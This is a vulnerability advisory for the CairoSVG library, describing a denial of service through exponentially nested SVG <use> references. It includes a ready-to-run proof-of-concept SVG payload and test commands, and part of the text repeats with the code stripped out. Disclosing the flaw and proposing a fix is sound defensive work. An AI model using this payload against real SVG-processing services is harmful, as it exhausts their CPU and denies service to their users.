Summary
Kozea/CairoSVG (~300K downloads/week) has exponential denial of service via recursive <use> element amplification in cairosvg/defs.py (line ~335). This causes CPU exhaustion from a small input.
Severity
High — CVSS 3.1: 7.5
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Vulnerable Code
File: cairosvg/defs.py (line ~335), function use()
The use() function recursively processes <use> elements without any depth or count limits. With 5 levels of nesting and 10 references each, a 1,411-byte SVG triggers 10^5 = 100,000 render calls.
Impact
- 1,411-byte SVG payload pins CPU at 100% indefinitely
- Memory stays flat at ~43MB — no OOM kill, process never terminates
- Any service accepting SVG input (thumbnailing, PDF generation, avatar rendering) is DoS-able
- Amplification factor: O(10^N) rendering calls from O(N) input
Proof of Concept
Save as poc.svg and run timeout 10 cairosvg poc.svg -o test.png:
<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs>
<g id="a"><rect width="1" height="1"/></g>
<g id="b"><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/></g>
<g id="c"><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/></g>
<g id="d"><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/></g>
<g id="e"><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/></g>
</defs>
<use xlink:href="#e"/>
</svg>Expected: timeout kills the process after 10 seconds (it never completes on its own).
Alternatively test with Python:
import cairosvg, signal
signal.alarm(5) # Kill after 5 seconds
try:
cairosvg.svg2png(bytestring=open("poc.svg").read())
except:
print("[!!!] CONFIRMED: CPU exhaustion — process did not complete in 5s")Suggested Fix
Add recursion depth counter to use() function. Cap at e.g. 10 levels. Also add total element budget to prevent amplification.
References
Credit
Kai Aizen (SnailSploit) — Adversarial AI & Security Research
SnailSploit Reporter
Summary
Kozea/CairoSVG (~300K downloads/week) has exponential denial of service via recursive
<use>element amplification incairosvg/defs.py(line ~335). This causes CPU exhaustion from a small input.Severity
High — CVSS 3.1: 7.5
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:HVulnerable Code
File:
cairosvg/defs.py(line ~335), functionuse()The
use()function recursively processes<use>elements without any depth or count limits. With 5 levels of nesting and 10 references each, a 1,411-byte SVG triggers 10^5 = 100,000 render calls.Impact
Proof of Concept
Save as
poc.svgand runtimeout 10 cairosvg poc.svg -o test.png:Expected:
timeoutkills the process after 10 seconds (it never completes on its own).Alternatively test with Python:
Suggested Fix
Add recursion depth counter to
use()function. Cap at e.g. 10 levels. Also add total element budget to prevent amplification.References
Credit
Kai Aizen (SnailSploit) — Adversarial AI & Security Research